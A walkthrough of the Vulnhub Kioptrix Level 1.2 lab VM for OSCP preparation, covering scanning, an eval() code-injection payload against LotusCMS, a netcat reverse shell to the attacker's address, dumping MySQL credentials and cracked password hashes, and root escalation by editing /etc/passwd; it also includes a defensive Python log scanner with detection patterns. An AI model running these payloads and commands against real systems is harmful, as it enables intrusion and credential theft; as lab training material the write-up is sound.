Kioptrix: Level 1.2 (#3) Walkthrough (Vulnhub)
Intro:
This VM is part of the TJ_Null list of machines used to prepare for the OSCP; you can download it here.
NB: a good way of learning is to solve these machines yourself first and then see how others solved them.
Start by downloading the VM, make sure it is on the same network as your Kali machine, and let's get started!
Scanning:
looking for the IP address
netdiscover
looking for open ports (without details)
nmap -T4 192.168.204.141 -p-
performing OS detection, version detection and script scanning on the open ports only
nmap -p22,80 -A 192.168.204.141
Enum:
let's start with HTTP (the SSH version is recent, so we will leave it for later in case we find exposed credentials)
nikto -h http://192.168.204.141
PS: don't forget to take notes of your findings
next, we need to fuzz for files and directories
export URL=http://192.168.204.141/FUZZ
wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt --hc 404 $URL
export URL=http://192.168.204.141/FUZZ/ # add a trailing /
wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt --hc 404 $URL
next, let’s try manual discovery/fuzzing
add kioptrix3.com to the /etc/hosts file
Note that loneferret is a possible username
we found some services running on the web server (phpMyAdmin and LotusCMS)
let’s look for any vulnerabilities in searchsploit
searchsploit phpmyadmin
searchsploit lotuscms
Since the OSCP exam allows Metasploit to be used only once, we need to understand the vulnerability and exploit it manually
Exploitation:
downloading the exploit
searchsploit -m php/remote/18565.rb
Let's try to understand what the exploit consists of
it looks like the problem lies in the page parameter, which ends up inside an eval() call
we want to test some special characters such as ' " # ) ( , ; in the URL
let's try the single quote ' in the URL
http://kioptrix3.com/index.php?page=index%27
the request generated an error, which is a good sign!!!
notice that the web root directory is /home/www/
we need to take a look at the eval() function (here) and at HTML special characters (here)
Now let's intercept the request with Burp, send it to Repeater, and try different combinations
after trying many options, this payload got executed
index');eval('phpinfo();');%23
> > > Code Execution !!!
Let's verify with the PHP system() function
let's open a netcat listener
nc -nvlp 8888
send this reverse shell command as a POST request using Burp
page=index');eval("system('nc+192.168.204.132+8888+-e+/bin/bash');");#
> > > We have a shell !!!
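From the defender's side, the injection above leaves a recognisable trace in the web server's access log. The following is an added example, not part of the original walkthrough: a small Python scanner that decodes the page parameter of each request and grades it. The log lines are constructed for the example, not captured from the VM, and the grading regexes are my own assumptions.

```python
import re
from urllib.parse import unquote_plus, urlsplit
# Constructed Apache combined-format lines (not captured from the VM): a normal
# page load, the single-quote probe from the walkthrough, and the eval() payload.
# The POST payload is deliberately absent: access logs never record request
# bodies, so body-borne injection needs a WAF or application-level logging.
SAMPLE_LOG = """\
192.168.204.132 - - [10/Jan/2024:10:00:01 +0000] "GET /index.php?page=index HTTP/1.1" 200 2345 "-" "Mozilla/5.0"
192.168.204.132 - - [10/Jan/2024:10:00:07 +0000] "GET /index.php?page=index%27 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
192.168.204.132 - - [10/Jan/2024:10:00:15 +0000] "GET /index.php?page=index%27);eval(%27phpinfo();%27);%23 HTTP/1.1" 200 51234 "-" "Mozilla/5.0"
"""
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
SAFE_PAGE = re.compile(r"[\w.-]+")  # what a legitimate page name looks like
# PHP functions that turn string data into code or shell commands.
CODE_EXEC = re.compile(r"\b(?:eval|assert|system|passthru|shell_exec|exec|popen)\s*\(", re.I)
# A quote followed by ')' and ';' is the shape needed to break out of the eval'd string.
QUOTE_BREAK = re.compile(r"""['"]\s*\)\s*;""")

def page_param(request_target):
    """Return the percent-decoded 'page' query value, or None if absent.
    Split by hand rather than with parse_qsl: older Python versions also split
    on ';', which would truncate exactly the payload we want to see."""
    for pair in urlsplit(request_target).query.split("&"):
        key, _, value = pair.partition("=")
        if key == "page":
            return unquote_plus(value)
    return None

def verdict(page):
    """Grade one decoded 'page' value as 'ok', 'suspect' or 'alert'."""
    if page is None or SAFE_PAGE.fullmatch(page):
        return "ok"
    if CODE_EXEC.search(page) or QUOTE_BREAK.search(page):
        return "alert"
    return "suspect"  # quotes or parentheses that a page name never needs

def scan_log(text):
    """Return (client_ip, method, decoded_page, verdict) for every parsable line."""
    rows = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if m:
            page = page_param(m.group(3))
            rows.append((m.group(1), m.group(2), page, verdict(page)))
    return rows

if __name__ == "__main__":
    for ip, method, page, grade in scan_log(SAMPLE_LOG):
        print(f"{grade:7} {ip} {method} page={page!r}")
```

The 'suspect' grade on the bare single quote is the probe step of the walkthrough; seeing it shortly before an 'alert' from the same client is the sequence worth paging on.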
Post Exp:
use S1ren's breakout snippet to get a stable shell with a valid TTY
############################################################
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color
alias ll='ls -lsaht --color=auto'
# Keyboard shortcut: Ctrl + Z (backgrounds the shell; run the next line on Kali)
stty raw -echo ; fg ; reset
stty columns 200 rows 200
############################################################
Let’s gather more information
looking for locally available services
netstat -tulpn
looking for system users
cat /etc/passwd
search the web root directory /home/www/kioptrix3.com for any credentials
grep -Ri "mysql" /home/www/kioptrix3.com | grep -E "username|password" --color=auto
We have found MySQL credentials
let’s login
mysql -uroot -pfuckeyou
show databases;
use mysql;
show tables;
select * from user;
localhost | root | *47FB3B1E573D80F44CD198DC65DE7764795F948E
Let's try another database
use gallery;
show tables;
select * from dev_accounts;
try hashes.com to crack them
dreg | 0d3eccfb887aabd50f243b3f155c0f85: Mast3r
loneferret | 5badcaf789d3d1d09794d8f021f40f0e: starwars
now the obvious thing is to log in as one of these users and list which sudo commands are allowed
su loneferret
sudo -l
> > > We have root access to a text editor !!!
Go to Kali and create a password hash using OpenSSL
openssl passwd -1
create a user line in passwd format
USER:PASSWD:UID:GID:USER:/home/USER:/bin/bash (UID:GID = 0:0 for root privileges)
copy it into /etc/passwd, save and quit
now switch to the new user
> > > You are root !!!
I hope this has been informative; I want to give a big thanks to S1ren for all her help.